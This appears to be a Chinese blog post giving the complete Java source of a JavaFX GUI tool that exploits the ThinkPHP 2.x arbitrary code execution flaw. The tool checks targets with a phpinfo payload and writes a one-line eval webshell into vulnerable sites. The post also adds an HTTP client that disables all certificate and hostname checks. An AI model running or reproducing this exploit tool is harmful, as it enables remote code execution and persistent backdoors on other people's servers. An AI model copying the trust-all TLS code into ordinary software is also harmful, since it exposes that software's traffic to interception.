一个小demo
懒得讲了,直接看代码吧
pox.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>Gui_demo</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>com.squareup.okhttp3</groupId>
<artifactId>okhttp</artifactId>
<version>4.9.3</version>
</dependency>
</dependencies>
</project>
HttpRequest.java
//这个可以直接拿来用
import java.io.IOException;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class HttpRequest {
public static final MediaType JSON = MediaType.parse("application/json; charset=utf-8");
OkHttpClient client = new OkHttpClient();
public String get(String url) throws IOException {
Request request = new Request.Builder()
.url(url)
.build();
Response response = client.newCall(request).execute();
return response.body().string();
}
public String post(String url, String json) throws IOException {
RequestBody body = RequestBody.create(JSON, json);
Request request = new Request.Builder()
.url(url)
.post(body)
.build();
Response response = client.newCall(request).execute();
return response.body().string();
}
}
Thinkphp.java
import java.io.IOException;
public class Thinkphp {
public static String run(String target) throws IOException {
HttpRequest request = new HttpRequest();
// System.out.println(request.get("http://192.168.126.137:18832/index.php?s=/index/index/name/$%7B@phpinfo()%7D"));
String response = request.get(target + "index.php?s=/index/index/name/$%7B@phpinfo()%7D");
return response;
}
public static String shell(String target) throws IOException {
HttpRequest request = new HttpRequest();
request.get(target + "index.php?s=/index/index/name/${@print(eval($_POST[1]))}");
String shl = target + "index.php?s=/index/index/name/${@print(eval($_POST[1]))}";
return shl;
}
}
GuiDemo.java
import javafx.application.Application;
import javafx.event.ActionEvent;
import javafx.event.EventHandler;
import javafx.scene.Scene;
import javafx.scene.control.*;
import javafx.scene.layout.AnchorPane;
import javafx.stage.Stage;
import java.io.IOException;
public class GuiDemo extends Application { //创建一个GuiDemo类,GuiDemo继承Application类
@Override
public void start(Stage primaryStage) throws Exception {
//标签
Label label = new Label("请输入目标");
label.setLayoutX(5);
label.setLayoutY(10);
label.setPrefWidth(70);
label.setPrefHeight(20);
// label1.setOpacity(0.5);//设置透明度
//目标文本框
TextArea textArea = new TextArea();
textArea.setLayoutX(75); //设置文本框的横坐标
textArea.setLayoutY(5); //设置文本框的纵坐标
textArea.setPrefWidth(220); //设置文本框的宽度
textArea.setPrefHeight(20); //设置文本框的高度
textArea.setText("请输入目标ip或者域名......");
//验证按钮
Button button = new Button("验证");
button.setLayoutX(310);
button.setLayoutY(10);
button.setPrefHeight(20);
button.setPrefWidth(50);
//传shell按钮
Button button1 = new Button("写入一句话木马");
button1.setLayoutX(370);
button1.setLayoutY(10);
button1.setPrefHeight(20);
button1.setPrefWidth(100);
//结果文本框
TextArea textArea1 = new TextArea();
textArea1.setLayoutX(5); //设置文本框的横坐标
textArea1.setLayoutY(50); //设置文本框的纵坐标
textArea1.setPrefWidth(500); //设置文本框的宽度
textArea1.setPrefHeight(300); //设置文本框的高度
textArea1.setWrapText(true);
// 设置按钮鼠标点击事件
button.setOnAction(new EventHandler<ActionEvent>() {
@Override
public void handle(ActionEvent event) {
String url = textArea.getText();
try {
String response = Thinkphp.run(url);
if (response.contains("PHP Version")) {
textArea1.setText("存在此漏洞");
}
} catch (IOException e) {
textArea1.setText("不存在此漏洞或者网络异常!!!");
}
}
});
//如果点击上传一句话按钮,那么先判断漏洞是否存在,如果存在就发送上传一句话请求,并且把一句话链接输出到textArea
button1.setOnAction(new EventHandler<ActionEvent>() {
@Override
public void handle(ActionEvent event) {
String url = textArea.getText();
try {
String response = Thinkphp.run(url);
if (response.contains("PHP Version")) {
textArea1.setText("一句话木马是:\n" + Thinkphp.shell(url));
}
} catch (IOException e) {
textArea1.setText("不存在此漏洞或者网络异常!!!");
}
}
});
//布局1
AnchorPane pane1 = new AnchorPane();
pane1.getChildren().addAll(label, button, button1, textArea, textArea1);
//场景
Scene scene1 = new Scene(pane1, 510, 400);
//主要的舞台/窗口
primaryStage.setTitle("ThinkPHP 2.x 任意代码执行漏洞 made by yz");
primaryStage.setScene(scene1);
/*窗口设置场景*/
primaryStage.show();
}
public static void main(String args[]) {
launch(args);
}
}
Main.java
public class Main {
public static void main(String[] args) {
GuiDemo.main(args);
}
}
虽然很简陋,但是基本功能是有了,其他的就是多加一些功能啥的,可以自由发挥。
特别要注意的是,考虑到目标网站可能是 https 网站,那么可以把场面 HttpRequest.java 文件换成以下:
import okhttp3.*;
import javax.net.ssl.*;
import java.io.IOException;
public class HttpRequest {
public static final MediaType JSON = MediaType.parse("application/json; charset=utf-8");
// static OkHttpClient client = new OkHttpClient();
//下面是跳过https网站证书验证的,我直接复制的
public static OkHttpClient getUnsafeOkHttpClient() {
try {
final TrustManager[] trustAllCerts = new TrustManager[]{
new X509TrustManager() {
@Override
public void checkClientTrusted(java.security.cert.X509Certificate[] chain, String authType) {
}
@Override
public void checkServerTrusted(java.security.cert.X509Certificate[] chain, String authType) {
}
@Override
public java.security.cert.X509Certificate[] getAcceptedIssuers() {
return new java.security.cert.X509Certificate[]{};
}
}
};
final SSLContext sslContext = SSLContext.getInstance("SSL");
sslContext.init(null, trustAllCerts, new java.security.SecureRandom());
final javax.net.ssl.SSLSocketFactory sslSocketFactory = sslContext.getSocketFactory();
OkHttpClient.Builder builder = new OkHttpClient.Builder();
builder.sslSocketFactory(sslSocketFactory);
builder.hostnameVerifier(new HostnameVerifier() {
@Override
public boolean verify(String hostname, SSLSession session) {
return true;
}
});
return builder.build();
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public String get(String url) throws IOException {
Request request = new Request.Builder()
.url(url)
.build();
OkHttpClient client = getUnsafeOkHttpClient();
Response response = client.newCall(request).execute();
return response.body().string();
}
public String post(String url, String json) throws IOException {
RequestBody body = RequestBody.create(JSON, json);
Request request = new Request.Builder()
.url(url)
.post(body)
.build();
OkHttpClient client = getUnsafeOkHttpClient();
Response response = client.newCall(request).execute();
return response.body().string();
}
}
参考
JAVA-GUI 工具的编写-----事件篇 (qq.com)
826
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
